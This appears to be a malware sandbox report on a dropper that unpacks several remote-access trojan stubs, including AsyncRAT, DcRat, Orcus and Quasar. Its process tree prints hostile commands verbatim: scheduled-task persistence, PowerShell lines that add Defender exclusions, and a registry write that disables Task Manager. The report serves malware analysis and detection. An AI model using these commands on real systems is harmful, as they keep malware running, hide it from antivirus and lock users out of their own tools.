pid Process 4832 Fontsession.exe 4704 powershell.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 4832 Fontsession.exe 4832 Fontsession.exe 4704 powershell.exe 4704 powershell.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 3212 AsyncStub.exe 4832 Fontsession.exe 4832 Fontsession.exe 4832 Fontsession.exe 4832 Fontsession.exe 4832 Fontsession.exe 3096 powershell.exe 3096 powershell.exe 3096 powershell.exe 1420 powershell.exe 1420 powershell.exe 1420 powershell.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 2428 Fontsession.exe 4560 WizWormStub.exe 4560 WizWormStub.exe 4836 dllhost.exe 4836 dllhost.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 1740 AudioDriver.exe 1740 AudioDriver.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 4560 WizWormStub.exe Token: SeDebugPrivilege 1408 QuasarStub.exe Token: SeDebugPrivilege 1516 Client.exe Token: SeDebugPrivilege 4832 Fontsession.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 1740 AudioDriver.exe Token: SeDebugPrivilege 3212 AsyncStub.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeDebugPrivilege 2428 Fontsession.exe Token: SeDebugPrivilege 1420 powershell.exe Token: SeDebugPrivilege 4560 WizWormStub.exe Token: SeDebugPrivilege 964 Ass.exe Token: SeDebugPrivilege 964 Ass.exe Token: SeDebugPrivilege 4836 dllhost.exe Token: SeDebugPrivilege 4908 WizWormStub.exe Token: SeDebugPrivilege 1844 WizWormStub.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1516 Client.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1516 Client.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1740 AudioDriver.exe 1516 Client.exe 4560 WizWormStub.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3568 wrote to memory of 3212 3568 713e742f7314ca8d684137f996540b4b.exe 86 PID 3568 wrote to memory of 3212 3568 713e742f7314ca8d684137f996540b4b.exe 86 PID 3568 wrote to memory of 3212 3568 713e742f7314ca8d684137f996540b4b.exe 86 PID 3568 wrote to memory of 4048 3568 713e742f7314ca8d684137f996540b4b.exe 88 PID 3568 wrote to memory of 4048 3568 713e742f7314ca8d684137f996540b4b.exe 88 PID 3568 wrote to memory of 4048 3568 713e742f7314ca8d684137f996540b4b.exe 88 PID 3568 wrote to memory of 1736 3568 713e742f7314ca8d684137f996540b4b.exe 89 PID 3568 wrote to memory of 1736 3568 713e742f7314ca8d684137f996540b4b.exe 89 PID 3568 wrote to memory of 1736 3568 713e742f7314ca8d684137f996540b4b.exe 89 PID 3568 wrote to memory of 1408 3568 713e742f7314ca8d684137f996540b4b.exe 90 PID 3568 wrote to memory of 1408 3568 713e742f7314ca8d684137f996540b4b.exe 90 PID 3568 wrote to memory of 4560 3568 713e742f7314ca8d684137f996540b4b.exe 91 PID 3568 wrote to memory of 4560 3568 713e742f7314ca8d684137f996540b4b.exe 91 PID 4048 wrote to memory of 5024 4048 DCRatStub.exe 92 PID 4048 wrote to memory of 5024 4048 DCRatStub.exe 92 PID 4048 wrote to memory of 5024 4048 DCRatStub.exe 92 PID 4048 wrote to memory of 2168 4048 DCRatStub.exe 93 PID 4048 wrote to memory of 2168 4048 DCRatStub.exe 93 PID 4048 wrote to memory of 2168 4048 DCRatStub.exe 93 PID 1736 wrote to memory of 8 1736 OrcusStub.exe 94 PID 1736 wrote to memory of 8 1736 OrcusStub.exe 94 PID 1408 wrote to memory of 3404 1408 QuasarStub.exe 95 PID 1408 wrote to memory of 3404 1408 QuasarStub.exe 95 PID 5024 wrote to memory of 2696 5024 WScript.exe 97 PID 5024 wrote to memory of 2696 5024 WScript.exe 97 PID 5024 wrote to memory of 2696 5024 WScript.exe 97 PID 2696 wrote to memory of 4832 2696 cmd.exe 99 PID 2696 wrote to memory of 4832 2696 cmd.exe 99 PID 1408 wrote to memory of 1516 1408 QuasarStub.exe 100 PID 1408 wrote to memory of 1516 1408 QuasarStub.exe 100 PID 4560 wrote to memory of 
4704 4560 WizWormStub.exe 101 PID 4560 wrote to memory of 4704 4560 WizWormStub.exe 101 PID 1736 wrote to memory of 1740 1736 OrcusStub.exe 103 PID 1736 wrote to memory of 1740 1736 OrcusStub.exe 103 PID 1736 wrote to memory of 1740 1736 OrcusStub.exe 103 PID 1516 wrote to memory of 4032 1516 Client.exe 104 PID 1516 wrote to memory of 4032 1516 Client.exe 104 PID 3212 wrote to memory of 3528 3212 AsyncStub.exe 112 PID 3212 wrote to memory of 3528 3212 AsyncStub.exe 112 PID 3212 wrote to memory of 3528 3212 AsyncStub.exe 112 PID 3212 wrote to memory of 2384 3212 AsyncStub.exe 115 PID 3212 wrote to memory of 2384 3212 AsyncStub.exe 115 PID 3212 wrote to memory of 2384 3212 AsyncStub.exe 115 PID 3528 wrote to memory of 4204 3528 cmd.exe 155 PID 3528 wrote to memory of 4204 3528 cmd.exe 155 PID 3528 wrote to memory of 4204 3528 cmd.exe 155 PID 2384 wrote to memory of 4924 2384 cmd.exe 120 PID 2384 wrote to memory of 4924 2384 cmd.exe 120 PID 2384 wrote to memory of 4924 2384 cmd.exe 120 PID 4560 wrote to memory of 3096 4560 WizWormStub.exe 121 PID 4560 wrote to memory of 3096 4560 WizWormStub.exe 121 PID 4832 wrote to memory of 2428 4832 Fontsession.exe 127 PID 4832 wrote to memory of 2428 4832 Fontsession.exe 127 PID 2696 wrote to memory of 3904 2696 cmd.exe 128 PID 2696 wrote to memory of 3904 2696 cmd.exe 128 PID 2696 wrote to memory of 3904 2696 cmd.exe 128 PID 4560 wrote to memory of 1420 4560 WizWormStub.exe 129 PID 4560 wrote to memory of 1420 4560 WizWormStub.exe 129 PID 2428 wrote to memory of 2396 2428 Fontsession.exe 163 PID 2428 wrote to memory of 2396 2428 Fontsession.exe 163 PID 2396 wrote to memory of 2912 2396 cmd.exe 165 PID 2396 wrote to memory of 2912 2396 cmd.exe 165 PID 4560 wrote to memory of 1216 4560 WizWormStub.exe 166 PID 4560 wrote to memory of 1216 4560 WizWormStub.exe 166 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run at boot or at set times; it is the same persistence mechanism the many schtasks.exe /create commands listed under Processes rely on.
Processes
-
C:\Users\Admin\AppData\Local\Temp\713e742f7314ca8d684137f996540b4b.exe"C:\Users\Admin\AppData\Local\Temp\713e742f7314ca8d684137f996540b4b.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Users\Admin\AppData\Local\Temp\AsyncStub.exe"C:\Users\Admin\AppData\Local\Temp\AsyncStub.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Ass" /tr '"C:\Users\Admin\AppData\Local\Temp\Ass.exe"' & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Ass" /tr '"C:\Users\Admin\AppData\Local\Temp\Ass.exe"'4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp71B5.tmp.bat""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4924
-
-
C:\Users\Admin\AppData\Local\Temp\Ass.exe"C:\Users\Admin\AppData\Local\Temp\Ass.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCRatStub.exe"C:\Users\Admin\AppData\Local\Temp\DCRatStub.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ChainPortsessionbroker\QV4mcYA2Sc8KOpCoQlEXh.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ChainPortsessionbroker\G0RgA51UzNSlvJ.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\ChainPortsessionbroker\Fontsession.exe"C:\ChainPortsessionbroker\Fontsession.exe"5⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\ChainPortsessionbroker\Fontsession.exe"C:\ChainPortsessionbroker\Fontsession.exe"6⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\m2SweGUi15.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 8⤵ PID:2912
-
-
C:\ChainPortsessionbroker\dllhost.exe"C:\ChainPortsessionbroker\dllhost.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3904
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ChainPortsessionbroker\file.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:2168
-
-
-
C:\Users\Admin\AppData\Local\Temp\OrcusStub.exe"C:\Users\Admin\AppData\Local\Temp\OrcusStub.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe" --install3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:8
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\QuasarStub.exe"C:\Users\Admin\AppData\Local\Temp\QuasarStub.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:3404
-
-
C:\Windows\system32\SubDir\Client.exe"C:\Windows\system32\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4032
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WizWormStub.exe"C:\Users\Admin\AppData\Local\Temp\WizWormStub.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WizWormStub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WizWormStub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WizWormStub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizWormStub" /tr "C:\ProgramData\WizWormStub.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1216
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\SearchApp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4604
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:996
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Program Files\Crashpad\attachments\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2712
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Crashpad\attachments\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Crashpad\attachments\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2244
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\ChainPortsessionbroker\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\ChainPortsessionbroker\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\ChainPortsessionbroker\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Users\Public\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4880
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Public\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Users\Public\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Windows\fr-FR\upfc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2176
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Windows\fr-FR\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\Windows\fr-FR\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4836
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4416
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\Services\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4820
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Common Files\Services\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\Services\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ClientC" /sc MINUTE /mo 5 /tr "'C:\Windows\Panther\actionqueue\Client.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1412
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Client" /sc ONLOGON /tr "'C:\Windows\Panther\actionqueue\Client.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3532
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ClientC" /sc MINUTE /mo 7 /tr "'C:\Windows\Panther\actionqueue\Client.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4260
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\Windows\appcompat\SearchApp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3672
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\appcompat\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4584
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Windows\appcompat\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1936
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Defender\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "timeoutt" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\timeout.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "timeout" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\timeout.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "timeoutt" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\timeout.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\ChainPortsessionbroker\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:264
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\ChainPortsessionbroker\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1260
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\ChainPortsessionbroker\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2416
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4072
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\ChainPortsessionbroker\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3592
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\ChainPortsessionbroker\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4648
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\ChainPortsessionbroker\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2928
-
C:\ProgramData\WizWormStub.exeC:\ProgramData\WizWormStub.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
C:\ProgramData\WizWormStub.exeC:\ProgramData\WizWormStub.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1844
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter (1): PowerShell (1)
Scheduled Task/Job (1): Scheduled Task (1)
Persistence
Boot or Logon Autostart Execution (2): Registry Run Keys / Startup Folder (1), Winlogon Helper DLL (1)
Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
Boot or Logon Autostart Execution (2): Registry Run Keys / Startup Folder (1), Winlogon Helper DLL (1)
Scheduled Task/Job (1): Scheduled Task (1)
Note: the Defender exclusion commands (powershell.exe Add-MpPreference, PIDs 4704, 3096 and 1420) and the DisableTaskMgr registry write (reg.exe, PID 3904) shown under Processes are not tabulated in this ATT&CK summary.
Replay Monitor
Downloads
-
Filesize
2.3MB
MD5e68c730d5e9eea130b20f99f8380e644
SHA1d5387728b7aa9724e5f49d9ebe871c4bcc447c01
SHA25644a30d53788ccbbef510a68b894c40a093ecc4a934b6a7c91037d3180987bf71
SHA5124389361097a762576b0ed8da4ebec4d4189af80decbe0b4e2e7c12a6b2f206107ad0597be557690cac73f0e5875057e48a7338a52403288527329e276cbc6041
-
Filesize
166B
MD5eff3710eb6f094ac204ff6b4d7d7107e
SHA12ec3eebb2037ee862dfd7984101bbec687c7ad7b
SHA2565a27f828660d67faae0e0c7c9d201c543f9e16db4ef1cb5f0883899b86e321d7
SHA51219becb062d3cf759b820fb45170e9aab11e6179475c0090f9306ca2e722f24b74274263fbb4783096ceb10d311dc8f1f3261ef9f44ee0235a70aa0f004cb508c
-
Filesize
224B
MD555733945e00baace8cd6236206f9acf6
SHA161a590cb6acb3e6bfaac1fc5752162fc60647ce5
SHA256d7f4a58ae89de59a45958e9a78eb6d3e83ff45d9843747850fc4f4974f24e3e3
SHA51258ac06c815cc508dc6281cae24a78ac98fce1bd310809f0311a4613adf2f103e92ccd65e073787ef682d9a37adc3ef6fd1c81f7eebdc5f7a0f7b28636caa76c8
-
Filesize
34B
MD5677cc4360477c72cb0ce00406a949c61
SHA1b679e8c3427f6c5fc47c8ac46cd0e56c9424de05
SHA256f1cccb5ae4aa51d293bd3c7d2a1a04cb7847d22c5db8e05ac64e9a6d7455aa0b
SHA5127cfe2cc92f9e659f0a15a295624d611b3363bd01eb5bcf9bc7681ea9b70b0564d192d570d294657c8dc2c93497fa3b4526c975a9bf35d69617c31d9936573c6a
-
Filesize
1KB
MD5bbb951a34b516b66451218a3ec3b0ae1
SHA17393835a2476ae655916e0a9687eeaba3ee876e9
SHA256eb70c64ae99d14ac2588b7a84854fbf3c420532d7fe4dfd49c7b5a70c869943a
SHA51263bcbfcf8e7421c66855c487c31b2991a989bdea0c1edd4c40066b52fa3eb3d9d37db1cd21b8eb4f33dd5870cc20532c8f485eab9c0b4f6b0793a35c077f2d6f
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
